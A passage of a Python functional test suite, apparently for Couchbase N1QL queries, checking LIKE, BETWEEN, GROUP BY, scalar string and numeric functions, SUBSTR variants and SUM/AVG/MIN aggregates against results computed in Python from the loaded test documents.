queries_errors = {"SELECT tasks_points FROM {0} WHERE tasks_points.* LIKE '_1%'": ('syntax error', 3000)}
self.negative_common_body(queries_errors)
queries_errors = {"SELECT tasks_points FROM {0} WHERE REVERSE(tasks_points.*) LIKE '%1_'": ('syntax error',
3000)}
self.negative_common_body(queries_errors)
def test_like_any(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
self.query = "SELECT name, email FROM %s d WHERE (ANY vm IN d.VMs" % query_bucket + \
" SATISFIES vm.os LIKE '%bun%'" + \
"END) AND (ANY skill IN d.skills " + \
"SATISFIES skill = 'skill2010' END) ORDER BY name"
actual_result = self.run_cbq_query()
expected_result = [{"name": doc['name'], "email": doc["email"]}
for doc in self.full_list
if len([vm for vm in doc["VMs"]
if vm["os"].find('bun') != -1]) > 0 and
len([skill for skill in doc["skills"]
if skill == 'skill2010']) > 0]
expected_result = sorted(expected_result, key=lambda doc: (doc['name']))
self._verify_results(actual_result['results'], expected_result)
def test_like_every(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
self.query = "SELECT name, email FROM %s d WHERE (EVERY vm IN d.VMs " % query_bucket + \
"SATISFIES vm.os NOT LIKE '%cent%' END)" + \
" AND (ANY skill IN d.skills SATISFIES skill =" + \
" 'skill2010' END) ORDER BY name"
actual_result = self.run_cbq_query()
expected_result = [{"name": doc['name'], "email": doc["email"]}
for doc in self.full_list
if len([vm for vm in doc["VMs"]
if vm["os"].find('cent') == -1]) == len(doc["VMs"]) and
len([skill for skill in doc["skills"]
if skill == 'skill2010']) > 0]
expected_result = sorted(expected_result, key=lambda doc: (doc['name']))
self._verify_results(actual_result['results'], expected_result)
def test_like_aliases(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
self.query = "select name AS NAME from %s " % query_bucket + \
"AS EMPLOYEE where EMPLOYEE.name LIKE '_mpl%' ORDER BY name"
actual_result = self.run_cbq_query()
self.query = "select name AS NAME from %s " % query_bucket + \
"AS EMPLOYEE where reverse(EMPLOYEE.name) LIKE '%lpm_' ORDER BY name"
actual_result1 = self.run_cbq_query()
self.assertEqual(actual_result['results'], actual_result1['results'])
expected_result = [{"NAME": doc['name']} for doc in self.full_list
if doc["name"].find('mpl') == 1]
expected_result = sorted(expected_result, key=lambda doc: (doc['NAME']))
self._verify_results(actual_result['results'], expected_result)
def test_like_wildcards(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
self.query = "SELECT email FROM %s WHERE email " % query_bucket + \
"LIKE '%@%.%' ORDER BY email"
actual_result = self.run_cbq_query()
self.query = "SELECT email FROM %s WHERE reverse(email) " % query_bucket + \
"LIKE '%.%@%' ORDER BY email"
actual_result1 = self.run_cbq_query()
self.assertEqual(actual_result['results'], actual_result1['results'])
expected_result = [{"email": doc['email']} for doc in self.full_list
if re.match(r'.*@.*\..*', doc['email'])]
expected_result = sorted(expected_result, key=lambda doc: (doc['email']))
self._verify_results(actual_result['results'], expected_result)
self.query = "SELECT email FROM %s WHERE email" % query_bucket + \
" LIKE '%@%.h' ORDER BY email"
actual_result = self.run_cbq_query()
expected_result = []
self._verify_results(actual_result['results'], expected_result)
def test_prepared_like_wildcards(self):
self.fail_if_no_buckets()
if self.monitoring:
self.query = "select * from system:prepareds"
result = self.run_cbq_query()
self.assertTrue(result['metrics']['resultCount'] == 0)
for query_bucket in self.query_buckets:
self.query = "SELECT email FROM %s WHERE email " % query_bucket + \
"LIKE '%@%.%' ORDER BY email"
self.prepared_common_body()
if self.monitoring:
self.query = "select * from system:prepareds"
result = self.run_cbq_query()
self.assertTrue(result['metrics']['resultCount'] == 1)
def test_between(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
self.query = "SELECT name FROM {0} WHERE join_mo BETWEEN 1 AND 6 ORDER BY name".format(query_bucket)
actual_result = self.run_cbq_query()
expected_result = [{"name": doc['name']} for doc in self.full_list if 1 <= doc["join_mo"] <= 6]
expected_result = sorted(expected_result, key=lambda doc: (doc['name']))
self._verify_results(actual_result['results'], expected_result)
self.query = "SELECT name FROM {0} WHERE join_mo NOT BETWEEN 1 AND 6 ORDER BY name".format(query_bucket)
actual_result = self.run_cbq_query()
expected_result = [{"name": doc['name']} for doc in self.full_list if not 1 <= doc["join_mo"] <= 6]
expected_result = sorted(expected_result, key=lambda doc: (doc['name']))
self._verify_results(actual_result['results'], expected_result)
def test_between_negative(self):
queries_errors = {'SELECT name FROM %s WHERE join_mo BETWEEN 1 AND -10 ORDER BY name': ('syntax error', 3000),
'SELECT name FROM %s WHERE join_mo BETWEEN 1 AND a ORDER BY name': ('syntax error', 3000)}
self.negative_common_body(queries_errors)
##############################################################################################
#
# GROUP BY
##############################################################################################
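# GROUP BY results are validated by de-duplicating the projected field client-side
# (via a set of item tuples) and comparing the sorted lists.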
def test_group_by(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
self.query = "SELECT tasks_points.task1 AS task from %s " % query_bucket + \
"WHERE join_mo>7 GROUP BY tasks_points.task1 " + \
"ORDER BY tasks_points.task1"
if self.analytics:
self.query = "SELECT d.tasks_points.task1 AS task from %s d " % query_bucket + \
"WHERE d.join_mo>7 GROUP BY d.tasks_points.task1 " + \
"ORDER BY d.tasks_points.task1"
actual_result = self.run_cbq_query()
expected_result = [{"task": doc['tasks_points']["task1"]}
for doc in self.full_list
if doc["join_mo"] > 7]
expected_result = [dict(y) for y in set(tuple(x.items()) for x in expected_result)]
expected_result = sorted(expected_result, key=lambda doc: (doc['task']))
self._verify_results(actual_result['results'], expected_result)
def test_group_by_having(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
self.query = "from %s WHERE join_mo>7 GROUP BY tasks_points.task1 " % query_bucket + \
"HAVING COUNT(tasks_points.task1) > 0 SELECT tasks_points.task1 " + \
"AS task ORDER BY tasks_points.task1"
actual_result = self.run_cbq_query()
expected_result = [{"task": doc['tasks_points']["task1"]}
for doc in self.full_list
if doc["join_mo"] > 7]
expected_result = [doc for doc in expected_result
if expected_result.count(doc) > 0]
expected_result = [dict(y) for y in set(tuple(x.items()) for x in expected_result)]
expected_result = sorted(expected_result, key=lambda doc: (doc['task']))
self._verify_results(actual_result['results'], expected_result)
def test_group_by_aggr_fn(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
self.query = "SELECT tasks_points.task1 AS task from %s " % query_bucket + \
"WHERE join_mo>7 GROUP BY tasks_points.task1 " + \
"HAVING COUNT(tasks_points.task1) > 0 AND " + \
"(MIN(join_day)=1 OR MAX(join_yr=2011)) " + \
"ORDER BY tasks_points.task1"
actual_result = self.run_cbq_query()
if self.analytics:
self.query = "SELECT d.tasks_points.task1 AS task from %s d " % query_bucket + \
"WHERE d.join_mo>7 GROUP BY d.tasks_points.task1 " + \
"HAVING COUNT(d.tasks_points.task1) > 0 AND " + \
"(MIN(d.join_day)=1 OR MAX(d.join_yr=2011)) " + \
"ORDER BY d.tasks_points.task1"
tmp_groups = {doc['tasks_points']["task1"] for doc in self.full_list}
expected_result = [{"task": group} for group in tmp_groups
if [doc['tasks_points']["task1"]
for doc in self.full_list].count(group) > 0 and
(min([doc["join_day"] for doc in self.full_list
if doc['tasks_points']["task1"] == group]) == 1 or
max([doc["join_yr"] for doc in self.full_list
if doc['tasks_points']["task1"] == group]) == 2011)]
expected_result = sorted(expected_result, key=lambda doc: (doc['task']))
self._verify_results(actual_result['results'], expected_result)
def test_prepared_group_by_aggr_fn(self):
self.fail_if_no_buckets()
if self.monitoring:
self.query = "select * from system:prepareds"
result = self.run_cbq_query()
self.assertTrue(result['metrics']['resultCount'] == 0)
for query_bucket in self.query_buckets:
self.query = "SELECT tasks_points.task1 AS task from %s " % query_bucket + \
"WHERE join_mo>7 GROUP BY tasks_points.task1 " + \
"HAVING COUNT(tasks_points.task1) > 0 AND " + \
"(MIN(join_day)=1 OR MAX(join_yr=2011)) " + \
"ORDER BY tasks_points.task1"
self.prepared_common_body()
if self.monitoring:
self.query = "select * from system:prepareds"
result = self.run_cbq_query()
self.assertTrue(result['metrics']['resultCount'] == 1)
self.query = "delete from system:prepareds"
self.run_cbq_query()
self.query = "select * from system:prepareds"
result = self.run_cbq_query()
self.assertTrue(result['metrics']['resultCount'] == 0)
def test_group_by_satisfy(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
self.query = "SELECT job_title, AVG(test_rate) as avg_rate FROM %s d " % query_bucket + \
"WHERE (ANY skill IN d.skills SATISFIES skill = 'skill2010' end) " + \
"AND (ANY vm IN d.VMs SATISFIES vm.RAM = 5 end) " + \
"GROUP BY job_title ORDER BY job_title"
if self.analytics:
self.query = "SELECT d.job_title, AVG(d.test_rate) as avg_rate FROM %s d " % query_bucket + \
"WHERE (ANY skill IN d.skills SATISFIES skill = 'skill2010' end) " + \
"AND (ANY vm IN d.VMs SATISFIES vm.RAM = 5 end) " + \
"GROUP BY d.job_title ORDER BY d.job_title"
actual_result = self.run_cbq_query()
tmp_groups = {doc["job_title"] for doc in self.full_list}
expected_result = [{"job_title": doc['job_title'],
"test_rate": doc["test_rate"]}
for doc in self.full_list
if 'skill2010' in doc["skills"] and
len([vm for vm in doc["VMs"] if vm["RAM"] == 5]) > 0]
expected_result = [{"job_title": group,
"avg_rate": math.fsum([doc["test_rate"]
for doc in expected_result
if doc["job_title"] == group]) /
len([doc["test_rate"] for doc in expected_result
if doc["job_title"] == group])}
for group in tmp_groups]
expected_result = sorted(expected_result, key=lambda doc: (doc['job_title']))
self._verify_results(actual_result['results'], expected_result)
def test_group_by_negative(self):
queries_errors = {"SELECT tasks_points from {0} WHERE tasks_points.task2>3" +
" GROUP BY tasks_points.*":
('syntax error', 3000),
"from {0} WHERE join_mo>7 GROUP BY tasks_points.task1 " +
"SELECT tasks_points.task1 AS task HAVING COUNT(tasks_points.task1) > 0":
('syntax error', 3000)}
self.negative_common_body(queries_errors)
# This test is not used anywhere
def test_groupby_first(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
self.query = "select job_title, (FIRST p FOR p IN ARRAY_AGG(name) END) as names from {0} group by " \
"job_title order by job_title ".format(query_bucket)
actual_result = self.run_cbq_query()
tmp_groups = {doc['job_title'] for doc in self.full_list}
expected_list = [{"job_title": group,
"names": ([x["name"] for x in self.full_list
if x["job_title"] == group][0])}
for group in tmp_groups]
expected_result = self.sort_nested_list(expected_list)
expected_result = sorted(expected_result, key=lambda doc: (doc['job_title']))
self.assertTrue(actual_result['results'] == expected_result)
##############################################################################################
#
# SCALAR FN
##############################################################################################
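# Scalar numeric/string functions (CEIL, FLOOR, ROUND, TRUNC, UPPER, LOWER, ...) are
# validated against the corresponding Python operations on the loaded documents.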
def test_ceil(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
self.query = "select name, ceil(test_rate) as rate from %s" % query_bucket
actual_result = self.run_cbq_query()
actual_result = sorted(actual_result['results'],
key=lambda doc: (doc['name'], doc['rate']))
expected_result = [{"name": doc['name'], "rate": math.ceil(doc['test_rate'])}
for doc in self.full_list]
expected_result = sorted(expected_result, key=lambda doc: (doc['name'],
doc['rate']))
self._verify_results(actual_result, expected_result)
self.query = "select name from %s where ceil(test_rate) > 5" % query_bucket
actual_result = self.run_cbq_query()
actual_result = sorted(actual_result['results'], key=lambda doc: (doc['name']))
expected_result = [{"name": doc['name']} for doc in self.full_list
if math.ceil(doc['test_rate']) > 5]
expected_result = sorted(expected_result, key=lambda doc: (doc['name']))
self._verify_results(actual_result, expected_result)
def test_floor(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
self.query = "select name, floor(test_rate) as rate from %s" % query_bucket
actual_result = self.run_cbq_query()
actual_result = sorted(actual_result['results'],
key=lambda doc: (doc['name'], doc['rate']))
expected_result = [{"name": doc['name'], "rate": math.floor(doc['test_rate'])}
for doc in self.full_list]
expected_result = sorted(expected_result, key=lambda doc: (doc['name'],
doc['rate']))
self._verify_results(actual_result, expected_result)
self.query = "select name from %s where floor(test_rate) > 5" % query_bucket
actual_result = self.run_cbq_query()
actual_result = sorted(actual_result['results'], key=lambda doc: (doc['name']))
expected_result = [{"name": doc['name']} for doc in self.full_list
if math.floor(doc['test_rate']) > 5]
expected_result = sorted(expected_result, key=lambda doc: (doc['name']))
self._verify_results(actual_result, expected_result)
self.query = "select name from %s where floor(job_title) > 5" % query_bucket
actual_result = self.run_cbq_query()
self._verify_results(actual_result['results'], [])
def test_greatest(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
self.query = "select name, GREATEST(skills[0], skills[1]) as SKILL from %s" % (
query_bucket)
actual_result = self.run_cbq_query()
actual_result = sorted(actual_result['results'],
key=lambda doc: (doc['name'], doc['SKILL']))
expected_result = [{"name": doc['name'], "SKILL":
(doc['skills'][0], doc['skills'][1])[doc['skills'][0] < doc['skills'][1]]}
for doc in self.full_list]
expected_result = sorted(expected_result, key=lambda doc: (doc['name'],
doc['SKILL']))
self._verify_results(actual_result, expected_result)
def test_least(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
self.query = "select name, LEAST(skills[0], skills[1]) as SKILL from %s" % (
query_bucket)
actual_result = self.run_cbq_query()
actual_result = sorted(actual_result['results'],
key=lambda doc: (doc['name'], doc['SKILL']))
expected_result = [{"name": doc['name'], "SKILL":
(doc['skills'][0], doc['skills'][1])[doc['skills'][0] > doc['skills'][1]]}
for doc in self.full_list]
expected_result = sorted(expected_result, key=lambda doc: (doc['name'],
doc['SKILL']))
self._verify_results(actual_result, expected_result)
def test_meta(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
self.query = 'SELECT distinct name FROM %s d WHERE META(d).`type` = "json"' % query_bucket
actual_result = self.run_cbq_query()
actual_result = sorted(actual_result['results'],
key=lambda doc: (doc['name']))
expected_result = [{"name": doc['name']} for doc in self.full_list]
expected_result = [dict(y) for y in set(tuple(x.items()) for x in expected_result)]
expected_result = sorted(expected_result, key=lambda doc: (doc['name']))
self._verify_results(actual_result, expected_result)
self.query = "SELECT distinct name FROM %s WHERE META().id IS NOT NULL" % query_bucket
actual_result = self.run_cbq_query()
actual_result = sorted(actual_result['results'], key=lambda doc: (doc['name']))
self._verify_results(actual_result, expected_result)
def test_meta_like(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
self.query = 'SELECT name FROM %s d WHERE META(d).id LIKE "%s"' % (query_bucket, "query%")
actual_result = self.run_cbq_query()
actual_result = sorted(actual_result['results'],
key=lambda doc: (doc['name']))
expected_result = [{"name": doc['name']} for doc in self.full_list]
expected_result = sorted(expected_result, key=lambda doc: (doc['name']))
self._verify_results(actual_result, expected_result)
def test_prepared_meta_like(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
self.query = 'SELECT name FROM %s d WHERE META(d).id ' % query_bucket + 'LIKE "employee%"'
self.prepared_common_body()
if self.monitoring:
self.query = 'select * from system:completed_requests'
result = self.run_cbq_query()
request_id = result['request_id']
self.query = 'delete from system:completed_requests where request_id = "%s"' % request_id
self.run_cbq_query()
result = self.run_cbq_query(
'select * from system:completed_requests where request_id = "%s"' % request_id)
self.assertTrue(result['metrics']['resultCount'] == 0)
def test_meta_flags(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
self.query = 'SELECT DISTINCT META().flags as flags FROM %s' % query_bucket
actual_result = self.run_cbq_query()
expected_result = [{"flags": self.item_flag}]
self._verify_results(actual_result['results'], expected_result)
def test_long_values(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
self.query = 'insert into %s values("k051", { "id":-9223372036854775808 } )' % query_bucket
self.run_cbq_query()
self.query = 'insert into %s values("k031", { "id":-9223372036854775807 } )' % query_bucket
self.run_cbq_query()
self.query = 'insert into %s values("k021", { "id":1470691191458562048 } )' % query_bucket
self.run_cbq_query()
self.query = 'insert into %s values("k011", { "id":9223372036854775807 } )' % query_bucket
self.run_cbq_query()
self.query = 'insert into %s values("k041", { "id":9223372036854775808 } )' % query_bucket
self.run_cbq_query()
self.query = 'select * from ' + query_bucket + ' d where meta().id = "{0}"'.format("k051")
actual_result = self.run_cbq_query()
print("k051 results is {0}".format(actual_result['results'][0]['d']))
# self.assertEqual(actual_result['results'][0]["default"],{'id': -9223372036854775808})
self.query = 'select * from ' + query_bucket + ' d where meta().id = "{0}"'.format("k031")
actual_result = self.run_cbq_query()
print("k031 results is {0}".format(actual_result['results'][0]['d']))
# self.assertEqual(actual_result['results'][0]["default"],{'id': -9223372036854775807})
self.query = 'select * from ' + query_bucket + ' d where meta().id = "{0}"'.format("k021")
actual_result = self.run_cbq_query()
print("k021 results is {0}".format(actual_result['results'][0]['d']))
# self.assertEqual(actual_result['results'][0]["default"],{'id': 1470691191458562048})
self.query = 'select * from ' + query_bucket + ' d where meta().id = "{0}"'.format("k011")
actual_result = self.run_cbq_query()
print("k011 results is {0}".format(actual_result['results'][0]['d']))
# self.assertEqual(actual_result['results'][0]["default"],{'id': 9223372036854775807})
self.query = 'select * from ' + query_bucket + ' d where meta().id = "{0}"'.format("k041")
actual_result = self.run_cbq_query()
print("k041 results is {0}".format(actual_result['results'][0]['d']))
# self.assertEqual(actual_result['results'][0]["default"],{'id': 9223372036854776000L})
self.query = 'delete from ' + query_bucket + ' where meta().id in ["k051","k021","k011","k041","k031"]'
self.run_cbq_query()
def test_meta_cas(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
self.query = 'select meta().cas from {0} order by meta().id limit 10'.format(query_bucket)
actual_result = self.run_cbq_query()
self.log.info(actual_result)
def test_meta_negative(self):
queries_errors = {'SELECT distinct name FROM %s WHERE META().type = "json"': ('syntax error', 3000)}
self.negative_common_body(queries_errors)
def test_length(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
self.query = 'Select name, email from %s where LENGTH(job_title) = 5' % query_bucket
actual_result = self.run_cbq_query()
actual_result = sorted(actual_result['results'],
key=lambda doc: (doc['name']))
expected_result = [{"name": doc['name'], "email": doc['email']}
for doc in self.full_list
if len(doc['job_title']) == 5]
expected_result = sorted(expected_result, key=lambda doc: (doc['name']))
self._verify_results(actual_result, expected_result)
def test_upper(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
self.query = 'SELECT DISTINCT UPPER(job_title) as JOB from %s' % query_bucket
actual_result = self.run_cbq_query()
actual_result = sorted(actual_result['results'],
key=lambda doc: (doc['JOB']))
expected_result = [{"JOB": doc['job_title'].upper()}
for doc in self.full_list]
expected_result = [dict(y) for y in set(tuple(x.items()) for x in expected_result)]
expected_result = sorted(expected_result, key=lambda doc: (doc['JOB']))
self._verify_results(actual_result, expected_result)
def test_lower(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
self.query = "SELECT distinct email from %s" % query_bucket + \
" WHERE LOWER(job_title) < 't'"
actual_result = self.run_cbq_query()
actual_result = sorted(actual_result['results'],
key=lambda doc: (doc['email']))
expected_result = [{"email": doc['email'].lower()}
for doc in self.full_list
if doc['job_title'].lower() < 't']
expected_result = [dict(y) for y in set(tuple(x.items()) for x in expected_result)]
expected_result = sorted(expected_result, key=lambda doc: (doc['email']))
self._verify_results(actual_result, expected_result)
def test_round(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
self.query = "select name, round(test_rate) as rate from %s" % query_bucket
actual_result = self.run_cbq_query()
actual_result = sorted(actual_result['results'],
key=lambda doc: (doc['name'], doc['rate']))
expected_result = [{"name": doc["name"], "rate": round(doc['test_rate'])}
for doc in self.full_list]
expected_result = sorted(expected_result, key=lambda doc: (doc['name'],
doc['rate']))
self._verify_results(actual_result, expected_result)
def test_trunc(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
self.query = "select name, TRUNC(test_rate, 0) as rate from %s" % query_bucket
actual_result = self.run_cbq_query()
actual_result = sorted(actual_result['results'],
key=lambda doc: (doc['name'], doc['rate']))
expected_result = [{"name": doc["name"], "rate": math.trunc(doc['test_rate'])}
for doc in self.full_list]
expected_result = sorted(expected_result, key=lambda doc: (doc['name'],
doc['rate']))
self._verify_results(actual_result, expected_result)
def test_first(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
self.query = "select name, FIRST vm.os for vm in VMs end as OS from %s" % (
query_bucket)
if self.analytics:
self.query = "select name, VMs[0].os as OS from %s" % query_bucket
actual_result = self.run_cbq_query()
actual_result = sorted(actual_result['results'],
key=lambda doc: (doc['name'], doc['OS']))
expected_result = [{"name": doc["name"], "OS": doc['VMs'][0]["os"]}
for doc in self.full_list]
expected_result = sorted(expected_result, key=lambda doc: (doc['name'],
doc['OS']))
self._verify_results(actual_result, expected_result)
##############################################################################################
#
# Substring
##############################################################################################
def test_substr(self):
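        """Verify SUBSTR(email, pos) for negative, zero and positive start positions
        against a Python-side expectation computed via self.expected_substr() over
        self.full_list (0-based variant)."""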
self.fail_if_no_buckets()
indices_to_test = [-100, -2, -1, 0, 1, 2, 100]
for index in indices_to_test:
for query_bucket in self.query_buckets:
self.query = "select name, SUBSTR(email, %s) as DOMAIN from %s" % (
str(index), query_bucket)
query_result = self.run_cbq_query()
query_docs = query_result['results']
sorted_query_docs = sorted(query_docs,
key=lambda doc: (doc['name'], doc['DOMAIN']))
expected_result = [{"name": doc["name"],
"DOMAIN": self.expected_substr(doc['email'], 0, index)}
for doc in self.full_list]
sorted_expected_result = sorted(expected_result, key=lambda doc: (
doc['name'], doc['DOMAIN']))
self._verify_results(sorted_query_docs, sorted_expected_result)
def test_substr0(self):
self.fail_if_no_buckets()
indices_to_test = [-100, -2, -1, 0, 1, 2, 100]
for index in indices_to_test:
for query_bucket in self.query_buckets:
self.query = "select name, SUBSTR0(email, %s) as DOMAIN from %s" % (
str(index), query_bucket)
query_result = self.run_cbq_query()
query_docs = query_result['results']
sorted_query_docs = sorted(query_docs,
key=lambda doc: (doc['name'], doc['DOMAIN']))
expected_result = [{"name": doc["name"],
"DOMAIN": self.expected_substr(doc['email'], 0, index)}
for doc in self.full_list]
sorted_expected_result = sorted(expected_result, key=lambda doc: (
doc['name'], doc['DOMAIN']))
self._verify_results(sorted_query_docs, sorted_expected_result)
def test_substr1(self):
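        """Same as test_substr/test_substr0, but for the 1-based SUBSTR1() variant
        (expected_substr is called with a base index of 1)."""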
self.fail_if_no_buckets()
indices_to_test = [-100, -2, -1, 0, 1, 2, 100]
for index in indices_to_test:
for query_bucket in self.query_buckets:
self.query = "select name, SUBSTR1(email, %s) as DOMAIN from %s" % (
str(index), query_bucket)
query_result = self.run_cbq_query()
query_docs = query_result['results']
sorted_query_docs = sorted(query_docs,
key=lambda doc: (doc['name'], doc['DOMAIN']))
expected_result = [{"name": doc["name"],
"DOMAIN": self.expected_substr(doc['email'], 1, index)}
for doc in self.full_list]
sorted_expected_result = sorted(expected_result, key=lambda doc: (
doc['name'], doc['DOMAIN']))
self._verify_results(sorted_query_docs, sorted_expected_result)
##############################################################################################
#
# AGGR FN
##############################################################################################
def test_agg_counters(self):
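        """Insert ten documents holding random integer values, then check that
        SUM() and AVG() over those keys match the Python-side sum/average, and
        that the documents can be removed again with DELETE ... USE KEYS."""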
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
vals = []
keys = []
for i in range(10):
new_val = random.randint(0, 99)
new_counter = "counter_US" + str(i)
vals.append(new_val)
keys.append(new_counter)
self.query = 'INSERT INTO %s VALUES ("%s",%s)' % (query_bucket, new_counter, new_val)
self.run_cbq_query()
self.query = 'SELECT sum(d) FROM %s d USE KEYS %s;' % (query_bucket, str(keys))
actual_results = self.run_cbq_query()
self.assertEqual(actual_results['results'][0]['$1'], sum(vals))
self.query = 'SELECT avg(d) FROM %s d USE KEYS %s;' % (query_bucket, str(keys))
actual_results = self.run_cbq_query()
self.assertEqual(actual_results['results'][0]['$1'], float(sum(vals)) / max(len(vals), 1))
self.query = 'DELETE FROM %s USE KEYS %s;' % (query_bucket, str(keys))
actual_results = self.run_cbq_query()
self.assertEqual(actual_results['results'], [])
def test_sum(self):
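        """Check SUM() with GROUP BY / ORDER BY, and with a HAVING clause, against
        per-join_mo totals computed from self.full_list via math.fsum()."""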
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
self.query = "SELECT join_mo, SUM(tasks_points.task1) as points_sum" + \
" FROM %s WHERE join_mo < 5 GROUP BY join_mo " % query_bucket + \
"ORDER BY join_mo"
if self.analytics:
self.query = "SELECT d.join_mo, SUM(d.tasks_points.task1) as points_sum" + \
" FROM %s d WHERE d.join_mo < 5 GROUP BY d.join_mo " % query_bucket + \
"ORDER BY d.join_mo"
actual_result = self.run_cbq_query()
tmp_groups = {doc['join_mo'] for doc in self.full_list
if doc['join_mo'] < 5}
expected_result = [{"join_mo": group,
"points_sum": int(math.fsum([doc['tasks_points']['task1']
for doc in self.full_list
if doc['join_mo'] == group]))}
for group in tmp_groups]
self._verify_results(actual_result['results'], expected_result)
self.query = "SELECT join_mo, SUM(test_rate) as rate FROM %s " % query_bucket + \
"as employees WHERE job_title='Sales' GROUP BY join_mo " + \
"HAVING SUM(employees.test_rate) > 0 and " + \
"SUM(test_rate) < 100000"
if self.analytics:
self.query = "SELECT d.join_mo, SUM(d.test_rate) as rate FROM %s d " % query_bucket + \
" WHERE d.job_title='Sales' GROUP BY d.join_mo " + \
"HAVING SUM(d.test_rate) > 0 and " + \
"SUM(d.test_rate) < 100000"
actual_result = self.run_cbq_query()
actual_result = [{"join_mo": doc["join_mo"], "rate": round(doc["rate"])} for doc in
actual_result['results']]
actual_result = sorted(actual_result, key=lambda doc: (doc['join_mo']))
tmp_groups = {doc['join_mo'] for doc in self.full_list}
expected_result = [{"join_mo": group,
"rate": round(math.fsum([doc['test_rate']
for doc in self.full_list
if doc['join_mo'] == group and
doc['job_title'] == 'Sales']))}
for group in tmp_groups
if math.fsum([doc['test_rate']
for doc in self.full_list
if doc['join_mo'] == group and
doc['job_title'] == 'Sales']) > 0 and
math.fsum([doc['test_rate']
for doc in self.full_list
if doc['join_mo'] == group and
doc['job_title'] == 'Sales']) < 100000]
expected_result = sorted(expected_result, key=lambda doc: (doc['join_mo']))
self._verify_results(actual_result, expected_result)
def test_prepared_sum(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
self.query = "SELECT join_mo, SUM(tasks_points.task1) as points_sum" + \
" FROM %s WHERE join_mo < 5 GROUP BY join_mo " % query_bucket + \
"ORDER BY join_mo"
self.prepared_common_body()
def test_sum_negative(self):
queries_errors = {'SELECT join_mo, SUM(job_title) as rate FROM %s as employees' +
' WHERE job_title="Sales" GROUP BY join_mo': ('syntax error', 3000),
'SELECT join_mo, SUM(VMs) as rate FROM %s as employees' +
' WHERE job_title="Sales" GROUP BY join_mo': ('syntax error', 3000)}
self.negative_common_body(queries_errors)
def test_avg(self):
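        """Check AVG() with GROUP BY, and with a HAVING clause mixing AVG() and
        SUM(); rates are rounded to two decimals on both sides before comparison
        to avoid floating-point noise."""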
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
self.query = "SELECT join_mo, AVG(tasks_points.task1) as points_avg" + \
" FROM %s WHERE join_mo < 5 GROUP BY join_mo " % query_bucket + \
"ORDER BY join_mo"
if self.analytics:
self.query = "SELECT d.join_mo, AVG(d.tasks_points.task1) as points_avg" + \
" FROM %s d WHERE d.join_mo < 5 GROUP BY d.join_mo " % query_bucket + \
"ORDER BY d.join_mo"
actual_result = self.run_cbq_query()
tmp_groups = {doc['join_mo'] for doc in self.full_list if doc['join_mo'] < 5}
expected_result = [{"join_mo": group,
"points_avg": math.fsum([doc['tasks_points']['task1']
for doc in self.full_list
if doc['join_mo'] == group]) /
len([doc['tasks_points']['task1']
for doc in self.full_list
if doc['join_mo'] == group])}
for group in tmp_groups]
expected_result = sorted(expected_result, key=lambda doc: (doc['join_mo']))
self._verify_results(actual_result['results'], expected_result)
self.query = "SELECT join_mo, AVG(test_rate) as rate FROM %s " % query_bucket + \
"as employees WHERE job_title='Sales' GROUP BY join_mo " + \
"HAVING AVG(employees.test_rate) > 0 and " + \
"SUM(test_rate) < 100000"
if self.analytics:
self.query = "SELECT d.join_mo, AVG(d.test_rate) as rate FROM %s d" % query_bucket + \
" WHERE d.job_title='Sales' GROUP BY d.join_mo " + \
"HAVING AVG(d.test_rate) > 0 and " + \
"SUM(d.test_rate) < 100000"
actual_result = self.run_cbq_query()
actual_result = [{'join_mo': doc['join_mo'],
'rate': round(doc['rate'], 2)}
for doc in actual_result['results']]
actual_result = sorted(actual_result, key=lambda doc: (doc['join_mo']))
tmp_groups = {doc['join_mo'] for doc in self.full_list}
expected_result = [{"join_mo": group,
"rate": math.fsum([doc['test_rate']
for doc in self.full_list
if doc['join_mo'] == group and
doc['job_title'] == 'Sales']) /
len([doc['test_rate']
for doc in self.full_list
if doc['join_mo'] == group and
doc['job_title'] == 'Sales'])}
for group in tmp_groups
if (math.fsum([doc['test_rate']
for doc in self.full_list
if doc['join_mo'] == group and
doc['job_title'] == 'Sales']) /
len([doc['test_rate']
for doc in self.full_list
if doc['join_mo'] == group and
doc['job_title'] == 'Sales']) > 0) and
math.fsum([doc['test_rate']
for doc in self.full_list
if doc['join_mo'] == group and
doc['job_title'] == 'Sales']) < 100000]
expected_result = [{'join_mo': doc['join_mo'],
'rate': round(doc['rate'], 2)}
for doc in expected_result]
expected_result = sorted(expected_result, key=lambda doc: (doc['join_mo']))
self._verify_results(actual_result, expected_result)
def test_min(self):
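        """Check MIN() with GROUP BY and a HAVING clause combining MIN() and SUM()
        against per-group minimums computed from self.full_list."""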
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
query_bucket = self.get_collection_name(query_bucket)
self.query = "SELECT join_mo, MIN(test_rate) as rate FROM %s " % query_bucket + \
"as employees WHERE job_title='Sales' GROUP BY join_mo " + \
"HAVING MIN(employees.test_rate) > 0 and " + \
"SUM(test_rate) < 100000"
